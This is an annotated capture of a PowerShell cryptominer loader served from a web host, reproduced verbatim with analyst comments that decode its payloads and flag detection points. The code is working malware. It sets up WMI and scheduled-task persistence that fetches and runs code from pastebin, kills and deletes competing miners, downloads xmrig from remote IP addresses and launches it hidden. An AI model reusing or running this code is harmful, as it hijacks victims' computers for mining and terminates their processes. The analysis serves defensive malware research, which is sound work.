
URL: http://27.1.1.34:8080/docs/cgi/wi.txt
Submission: On August 03 via manual from DE — Scanned from DE



# ---------------------------------------------------------------------------
# Analyst annotation: PowerShell cryptominer loader served as /docs/cgi/wi.txt.
# The code is the sample exactly as captured; only comments have been added.
# Stage 1 - persistence. Two paths: a WMI event subscription when the script
# is already SYSTEM, otherwise a scheduled task that relaunches it as SYSTEM.
# ---------------------------------------------------------------------------
# Remove every __FilterToConsumerBinding in root\subscription whose filter
# name is not 'Eventlogers': clears other actors' WMI persistence while
# keeping this sample's own binding.
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'Eventlogers'} |Remove-WmiObject
# Current account name with any "DOMAIN\" prefix stripped; used near the end
# of the script to build a per-user ...\AppData\Local\Temp path.
$current=[System.Security.Principal.WindowsIdentity]::GetCurrent().Name -replace "((.*)\\)", ""
# Substring test on the identity name (so any account containing "SYSTEM"
# takes this branch, not only NT AUTHORITY\SYSTEM).
if([System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Contains("SYSTEM")){
Try {
# Tear down any existing 'Eventlogers' filter and consumer, then delete
# every binding in the namespace ("__Path LIKE '%subscription%'" matches
# all of them) so the subscription is rebuilt from scratch below.
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='Eventlogers'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='Eventlogers'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%subscription%'" | Remove-WmiObject -Verbose
# Repeat of the first statement of the script; redundant after the line
# above has already removed every binding.
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'Eventlogers'} |Remove-WmiObject
$filterName = 'Eventlogers'
$consumerName = 'Eventlogers'
# WQL trigger: poll Win32_PerfFormattedData_PerfOS_System for modification
# events every 300 s. That perf class changes continuously, so this is in
# effect a ~5-minute timer - a common WMI-persistence pattern.
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
# CommandLineEventConsumer: hidden, non-interactive PowerShell with an -enc
# payload. The base64 (UTF-16LE) decodes to:
#   IEX (New-Object System.Net.Webclient).DownloadString('https://pastebin.com/raw/F7eCGLQU')
# i.e. a second stage fetched from pastebin and executed in memory on every
# timer tick.
$Arg =@{
        Name=$consumerName
            CommandLineTemplate="C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe  -NonInteractive -windowstyle hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwBGADcAZQBDAEcATABRAFUAJwApAA=="
}
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments $Arg
# Binding the filter to the consumer completes the persistence.
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
}
# Any failure (insufficient rights, WMI errors, -ErrorAction Stop above) is
# silently swallowed.
Catch {
}
}
Else{
# Non-SYSTEM path: a scheduled task every 5 minutes, named to blend in with
# the built-in .NET NGEN tasks and run as SYSTEM (/ru System - only succeeds
# if the caller already has admin rights). It launches 32-bit PowerShell from
# SysWOW64 with the execution policy bypassed and pulls a second stage from
# https://pastebin.com/raw/V5WR8U2t. Detection pivots: the task name, a
# /ru System task created from a user context, and the
# "-ep bypass ... downloadstring('https://pastebin.com/raw/...')" command line.
schtasks /create /sc MINUTE /mo 5 /tn  "\Microsoft\windows\.NET Framework\.NET Framework NGEN v4.0.30319 32" /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''https://pastebin.com/raw/V5WR8U2t'''))'"  /F /ru System
}
# Stage 2 - "Killer": evict competing cryptominers so this sample has the
# CPU to itself. Everything in here is destructive, runs with whatever
# rights the caller has, and discards most errors ($Null / 2> $Null /
# -ErrorAction SilentlyContinue).
Function Killer {

    # Remove known miners by services names
    # Service names used by other miner families; several masquerade as
    # Windows components ("lsass", "system", "Microsoft", "CLR", "sysmgt").
    $SrvName = "dom_miner", "SVSHost", "Microsoft Telemetry", "lsass", "Microsoft", "system", "Oracleupdate", "CLR", "sysmgt", "\gm", "WmdnPnSN", "cli_optimization_v2.0.55727_64","cli_optimization_v2.0.55727_32","Oracle Java System Service","Oracle Java System Services",
    "Sougoudl", "Nationaaal", "Natimmonal", "Nationaloll", "Nationalmll", "Samserver", "RpcEptManger", "NetMsmqActiv Media NVIDIA", "Sncryption Media Playeq","aspnet_state"
    foreach ($Srv in $SrvName) {

        #		Set-Service -Name $Srv -StartupType Disabled -ErrorAction SilentlyContinue

        #		Stop-Service -Name $Srv -Force -ErrorAction SilentlyContinue

        # Disable, stop and delete each service via sc.exe; output is thrown away.
        $Null = SC.exe Config $Srv Start= Disabled
        $Null = SC.exe Stop $Srv
        $Null = SC.exe Delete $Srv
    }

    # Remove known miners by scheduled tasks names
    # Task names of competing miners, many placed under \Microsoft\Windows\*
    # to look like built-in maintenance tasks. The task this sample creates
    # for itself ("...NGEN v4.0.30319 32") is not in the list, so it survives.
    $TaskName = "dsm", "dom", "Mysa2", "Mysa3", "ok", "Oracle Java", "Oracle Java Update", "Microsoft Telemetry", "Spooler SubSystem Service","\Microsoft\Windows\Bluetooth\UpdateDeviceTask","\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization",
    "\Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.50319 Critical","\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization Files-S-3-5-21-2236678156-433529325-2142214268-1138","\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization Files-S-3-5-21-2236678155-433529325-2142214968-1138","\Microsoft\Windows\DiskCleanup\SlientDefragDisks","\Microsoft\Windows\EDP\EDP App Lock Task","\Microsoft\Windows\EDP\EDP App Update Cache",
    "\Microsoft\Windows\MobilePC\DetectPC","\Microsoft\Windows\UPnP\UPnPHost","\Microsoft\Windows\UPnP\UPnPClient","\Microsoft\Windows\Shell\WinShell","\Microsoft\Windows\MUI\LPupdate","\Microsoft\Windows\DiskDiagnostic\Microsoft Windows Disk Diagnostic","\Microsoft\Windows\Shell\WindowsShellUpdate",
    "Oracle Products Reporter", "Update service for  products", "Update service for Oracle productsm", "Update service for Windows Service", "oka", "my1", "MicrosoftsWindowsy", "UAC", "Update service for Oracle productsoo","Microsoft .NET Framework NGEN v2.0.55727_x32"

    foreach ($Task in $TaskName) {
        # stderr (e.g. "task does not exist") is discarded.
        SchTasks.exe /Delete /TN $Task /F 2> $Null
    }
	
    # Terminates and removes miners by indicative command line arguments
    # Substring match over every process command line for mining-pool host
    # names and xmrig-style switches (--donate-level, --max-cpu-usage, -p x,
    # stratum+). Some patterns are very broad ('*monero*', '*-p x*') and
    # several are listed more than once (mineXMR, monero, mixpools.org).
    # Despite the comment above, nothing is "removed" - matched processes
    # are only killed (see $PathArray below).
    $CmdLine = Get-WmiObject -Class Win32_Process | Where-Object {
        $_.CommandLine -like '*pool.monero.hashvault.pro*' -Or $_.CommandLine -like '*blazepool*' -Or $_.CommandLine -like '*blockmasters*' -Or $_.CommandLine -like '*blockmasterscoins*' -Or $_.CommandLine -like '*bohemianpool*' -Or $_.CommandLine -like '*cryptmonero*' -Or $_.CommandLine -like '*cryptonight*' -Or $_.CommandLine -like '*crypto-pool*' -Or $_.CommandLine -like '*--donate-level*' -Or $_.CommandLine -like '*dwarfpool*' -Or $_.CommandLine -like '*hashrefinery*' -Or $_.CommandLine -like '*hashvault.pro*' -Or $_.CommandLine -like '*iwanttoearn.money*' -Or $_.CommandLine -like '*--max-cpu-usage*' -Or $_.CommandLine -like '*mine.bz*' -Or $_.CommandLine -like '*minercircle.com*' -Or $_.CommandLine -like '*minergate*' -Or $_.CommandLine -like '*miners.pro*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*minexmr*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*miningpoolhubcoins*' -Or $_.CommandLine -like '*mixpools.org*' -Or $_.CommandLine -like '*mixpools.org*' -Or $_.CommandLine -like '*monero*' -Or $_.CommandLine -like '*monero*' -Or $_.CommandLine -like '*monero.lindon-pool.win*' -Or $_.CommandLine -like '*moriaxmr.com*' -Or $_.CommandLine -like '*mypool.online*' -Or $_.CommandLine -like '*nanopool.org*' -Or $_.CommandLine -like '*nicehash*' -Or $_.CommandLine -like '*-p x*' -Or $_.CommandLine -like '*pool.electroneum.hashvault.pro*' -Or $_.CommandLine -like '*pool.xmr*' -Or $_.CommandLine -like '*poolto.be*' -Or $_.CommandLine -like '*prohash*' -Or $_.CommandLine -like '*prohash.net*' -Or $_.CommandLine -like '*ratchetmining.com*' -Or $_.CommandLine -like '*slushpool*' -Or $_.CommandLine -like '*stratum+*' -Or $_.CommandLine -like '*suprnova.cc*' -Or $_.CommandLine -like '*teracycle.net*' -Or $_.CommandLine -like '*usxmrpool*' -Or $_.CommandLine -like '*viaxmr.com*' -Or $_.CommandLine -like '*xmrpool*' -Or $_.CommandLine -like '*yiimp*' -Or $_.CommandLine -like '*zergpool*' -Or 
$_.CommandLine -like '*zergpoolcoins*' -Or $_.CommandLine -like '*zpool*'
    }
	
    if ($CmdLine -ne $Null) {
        $PathArray = @()
        foreach ($m in $CmdLine) {
            $evid = $($m.ProcessId)
            # The line below was not originally commented out; it whitelists the
            # miner's own PIDs. $minerPId is not defined anywhere in this file,
            # which suggests this function was lifted from another miner's
            # kill module.
            # if (($evid -eq $PId) -or ($evid -eq $minerPId)) { continue }
            Write-Host "[i] Miner PId: $evid"
            Get-Process -Id $evid | Stop-Process -Force

            # Create an array of competing miners' paths to remove
            # The process has already been killed above; this only decides
            # whether its image path is recorded. Living-off-the-land hosts
            # (cmd.exe, explorer.exe, notepad.exe) are left out of the list.
            # $PathArray is never read again anywhere in this file, so no file
            # is actually deleted here.
            $Path = $($m.Path)
            if ($Path -eq "$Env:WinDir\System32\cmd.exe" -Or $Path -eq "$Env:WinDir\SysWOW64\cmd.exe" -Or $Path -eq "$Env:WinDir\Explorer.exe" -Or $Path -eq "$Env:WinDir\Notepad.exe") { continue }
            if ($PathArray -NotContains $Path) { $PathArray += $Path }
        }
    }	
    # Uses netstat to list all "ESTABLISHED" connections
    # Afterwards it filters lines containing ports associated with miners and terminates the process using it
    # PowerShell PIDs sorted by CPU time, highest first; only $psids[0]
    # (the busiest PowerShell) is considered in the loop below.
    [array]$psids = Get-Process -Name PowerShell | Sort CPU -Descending | ForEach-Object {$_.Id}
    # "netstat -anop TCP" prints Proto / Local Address / Foreign Address /
    # State / PID, so after splitting on spaces $line[-1] is the owning PID
    # and $line[-3] the foreign address.
    $tcpconn = NetStat -anop TCP
    if ($psids -ne $null) {
        foreach ($t in $tcpconn) {
            $line = $t.split(' ')| ? {$_}
            if ($line -eq $null) { continue }
            # Kill the busiest PowerShell if it owns an ESTABLISHED connection
            # and the *whole line* (local or foreign side) contains one of these
            # port strings. ":443 " is in the list, so any PowerShell holding an
            # HTTPS connection qualifies - potentially the process running this
            # script. contains() is a substring test: ":1111" also matches
            # ":11110", ":4444" also matches ":44443", etc.
            if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":13333 ") -or $t.contains(":443 ") -or $t.contains(":1111") -or $t.contains(":2222") -or $t.contains(":4444") -or $t.contains(":5555") -or $t.contains(":6666") -or $t.contains(":7777") -or $t.contains(":8888") -or $t.contains(":9999") -or $t.contains(":14433") -or $t.contains(":14444") -or $t.contains(":45560") -or $t.contains(":65333"))) {
                $evid = $line[-1]
				
                # Same whitelist line as above, also commented out here.
                # if (($evid -eq $PId) -or ($evid -eq $minerPId)) { continue }
                Write-Host "[i] Miner PId: $evid"
                Get-Process -Id $evid | Stop-Process -Force
            }
        }
    }

    # Uses netstat to list all "ESTABLISHED" connections
    # Afterwards it lists processes connecting to remote ports associated with miners and terminates it
    # Same port-substring heuristic, now applied to the foreign-address column
    # ($line[-3]) of every ESTABLISHED connection; the owning PID is killed
    # whatever the process is. ":13333" appears twice in this list.
    foreach ($t in $tcpconn) {
        $line = $t.split(' ')| ? {$_}
        if (!($line -is [array])) { continue }
		
        if (($line[-3] -ne $null) -and $t.contains("ESTABLISHED") -and ($line[-3].contains(":1111")	-or $line[-3].contains(":2222") -or $line[-3].contains(":13333") -or $line[-3].contains(":4444")	-or $line[-3].contains(":5555") -or $line[-3].contains(":6666") -or $line[-3].contains(":6633") -or $line[-3].contains(":7777") -or $line[-3].contains(":8888") -or $line[-3].contains(":9980") -or $line[-3].contains(":9999") -or $line[-3].contains(":13333") -or $line[-3].contains(":14433") -or $line[-3].contains(":14444") -or $line[-3].contains(":16633") -or $line[-3].contains(":16666") -or $line[-3].contains(":45560") -or $line[-3].contains(":65333") -or $line[-3].contains(":55335") -or $line[-3].contains(":5790"))) {
            $evid = $line[-1]
            # Same whitelist line as above, also commented out here.
            # if (($evid -eq $PId) -or ($evid -eq $minerPId)) { continue }
            Write-Host "[i] Miner PId: $evid"
            Get-Process -Id $evid | Stop-Process -Force
        }
    }

    # Remove known miners by known process names
    # Image names (without .exe, some wildcarded) of competing miners. The
    # list also holds generic names - "notepad", "update", "service",
    # "helper", "Setting" - so unrelated processes with those names are
    # killed as well. Several entries are duplicated (minerd, upgeade,
    # auto-upgeade, svshost, pythonhs).
    $Miner = "LogBack", "xmrig*", "minerd", "svhostd", "notepad", "dom", "upgeade", "auto-upgeade", "svshost","pythonhs", "helper", "minerd", "MinerGate", "Carbon", "yamm1", "upgeade", "auto-upgeade", "svshost","kmkww","taskhostex",
    "SystemIIS", "SystemIISSec", 'WindowsUpdater*', "WindowsDefender*", "update", "dsm", "kkrrr", 'kkwsx', "sysupdate", "wxm", "GoogleServer", "wmice", 'windown', "SystemManagement","checked1", "networkservice", "pythonww", 
    "carss", "service", "csrsc", "cara", "javaupd", "gxdrv", "lsmosee", "secuams", "SQLEXPRESS_X64_86", "Calligrap", "Sqlceqp", "Setting", "Uninsta", "conhoste","xdxd","pythonhs","network02"
	
    foreach ($m in $Miner) {
        # Lookup errors for names that are not running are suppressed.
        Get-Process -Name $m -ErrorAction SilentlyContinue | Stop-Process -Force
    }
}
# Stage 3 - run the eviction routine, then clear competitor artifacts on disk.
Killer
# Remove any Image File Execution Options entry for javae.exe - the name this
# sample gives its own miner (see $miner_name further down) - presumably so a
# rival cannot block or hijack its launch via an IFEO "Debugger" value. The
# adjacent quoted fragments (Windows" "NT, Image" "File" "Execution" "Options)
# splice the spaces into a single registry-path argument.
cmd /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\javae.exe /f
# Delete competing miner binaries, then create a *directory* bearing the same
# name (del ... followed by mkdir ...). A directory called wxm.exe stops a
# later dropper from writing a file of that name - a squatting trick used
# against rival miners. Ordering is deliberate: the delete must precede the
# mkdir.
cmd.exe /c del /f /q C:\Windows\temp\wxm.exe
cmd.exe /c mkdir C:\Windows\temp\wxm.exe
cmd.exe /c del /f /q C:\Windows\temp\LogBack.exe
cmd.exe /c del /f /q C:\Windows\temp\svhostd.exe
cmd.exe /c mkdir C:\Windows\temp\LogBack.exe
cmd.exe /c del /f /q C:\ProgramData\Oracle\Java\java.exe
cmd.exe /c mkdir C:\Windows\temp\svhostd.exe
# The Oracle\Java\.oracle_jre_usage tree is removed and replaced by a
# placeholder directory named java.exe for the same reason.
cmd.exe /c rd /s /q C:\ProgramData\Oracle\Java\.oracle_jre_usage
cmd.exe /c mkdir C:\ProgramData\Oracle\Java\.oracle_jre_usage\java.exe
# Same trick for sysupdate.exe in the temp directory: clear system/hidden/
# read-only so the delete succeeds, delete, recreate as a directory, then
# mark the placeholder system+hidden+read-only. Both %tmp% and %temp% are
# handled, and mkdir/md are the same command, so the repeats are harmless.
cmd.exe /c attrib -s -h -r %tmp%\sysupdate.exe
cmd.exe /c attrib -s -h -r %temp%\sysupdate.exe
cmd.exe /c del /f /q %tmp%\sysupdate.exe
cmd.exe /c mkdir %tmp%\sysupdate.exe
cmd.exe /c md %tmp%\sysupdate.exe
cmd.exe /c mkdir %temp%\sysupdate.exe
cmd.exe /c md %temp%\sysupdate.exe
cmd.exe /c attrib +s +h +r %tmp%\sysupdate.exe
cmd.exe /c attrib +s +h +r %temp%\sysupdate.exe
# Stage 4 - payload configuration (indicators for blocking / hunting).
# Path of this script; not referenced anywhere else in the file.
$ne = $MyInvocation.MyCommand.Path
# Miner binary: an xmrig build hosted on a different server from the one
# that served this script.
$miner_url = "http://182.237.104.13:8081/xmrig.exe"
# The miner is dropped and run as javae.exe (Java look-alike name).
$miner_name = "javae"
# The miner config and the "clean.bat" kill module come from the same host
# that served this script (27.1.1.34:8080).
$miner_cfg_url = "http://27.1.1.34:8080/docs/cgi/config.json"
$miner_cfg_name = "config.json"
$killmodule_url = "http://27.1.1.34:8080/examples/clean.bat"
$killmodule_name = "clean.bat"
# All three artifacts land in the current user's %TMP%.
$miner_path = "$env:TMP\javae.exe"
$miner_cfg_path = "$env:TMP\config.json"
$killmodule_path = "$env:TMP\clean.bat"
# Stop any running copy of $proc_name, delete the file at $path and download
# a fresh copy from $url with System.Net.WebClient.
#  - Get-Process is also called with plain file names ("config.json",
#    "clean.bat") from the callers below; those never match a process and
#    the resulting error is not suppressed.
#  - Neither Remove-Item nor Stop-Process uses -Force / -ErrorAction, so a
#    locked, read-only or missing file just emits an error and execution
#    continues to the download.
#  - The Catch only prints "donwload with backurl"; no backup URL exists in
#    this file, so a failed download is never retried.
function Update($url,$path,$proc_name)
 {        
    Get-Process -Name $proc_name | Stop-Process
    Remove-Item $path
    Try {
        $vc = New-Object System.Net.WebClient
        $vc.DownloadFile($url,$path)
    }
    Catch {
        Write-Output "donwload with backurl"
    }
}

# Stage 5 - fetch/refresh the kill module and the miner, then launch.
# Inverted check: clean.bat is only (re)downloaded if it ALREADY exists in
# %TMP%. On a host where it has never been dropped, the else branch merely
# prints "download clean fail" and the Start-Process at the bottom of the
# script points at a file that does not exist.
if((Test-Path $killmodule_path))
{
	Update $killmodule_url $killmodule_path $killmodule_name
}
else {
    Write-Output "download clean fail"
}

# (Re)install only when no process named javae is running.
if(!(Get-Process $miner_name -ErrorAction SilentlyContinue)) 
{
    # Clear attributes on any existing config.json and try to remove it. rd
    # is the directory command, so this only removes a config.json that is a
    # directory; a plain file is left in place (with attributes cleared) for
    # Update to delete.
    cmd.exe /c attrib -s -h -r %tmp%\config.json
    cmd.exe /c attrib -s -h -r C:\Windows\temp\config.json
    cmd.exe /c rd /s /q %tmp%\config.json
    cmd.exe /c rd /s /q C:\Windows\temp\config.json
    # Terminate every process whose image lives in C:\Windows\Temp, the
    # Administrator's Temp or the current user's Temp ($current is set at
    # the top of the script). "wmic process ... delete" kills the matches.
    wmic process where "ExecutablePath like 'c:\\windows\\temp\\%'" delete
    wmic process where "ExecutablePath like 'C:\\Users\\Administrator\\AppData\\Local\\Temp\\%'" delete
    wmic process where "ExecutablePath like 'C:\\Users\\$current\\AppData\\Local\\Temp\\%'" delete
    # Download the miner (javae.exe) and its config.json into %TMP%.
    Update $miner_url $miner_path $miner_name
    Update $miner_cfg_url $miner_cfg_path $miner_cfg_name
    # Hide the config: read-only + system + hidden.
    cmd.exe /c attrib +R +S +H %tmp%\config.json
    cmd.exe /c attrib +R +S +H C:\Windows\temp\config.json
    # Launch the miner with no visible window.
	Start-Process $miner_path -windowstyle hidden
}
else 
{
	Write-Output "Miner Running"
}
# Kill anything executing from these directories - presumably locations
# where rival miners install. Note that C:\Windows\SysWOW64\ is a legitimate
# system directory, so this would also terminate any benign 32-bit process
# running from it (including the SysWOW64 PowerShell the scheduled-task
# branch at the top of the script relies on).
wmic process where "ExecutablePath like 'C:\\Windows\\Fonts\\%'" delete
wmic process where "ExecutablePath like 'C:\\Windows\\SysWOW64\\%'" delete
wmic process where "ExecutablePath like 'C:\\ProgramData\\Oracle\\Java\\%'" delete
wmic process where "ExecutablePath like 'C:\\Windows\\Microsoft.NET\\Framework64\\%'" delete
wmic process where "ExecutablePath like 'C:\\ProgramData\\nTNLLnvWzl\\%'" delete
# Run the downloaded kill module hidden, then force-kill every powershell.exe
# on the host - including the process running this script, so nothing placed
# after this line would execute.
Start-Process cmd.exe "/c $killmodule_path" -windowstyle hidden
cmd /c taskkill /f /im powershell.exe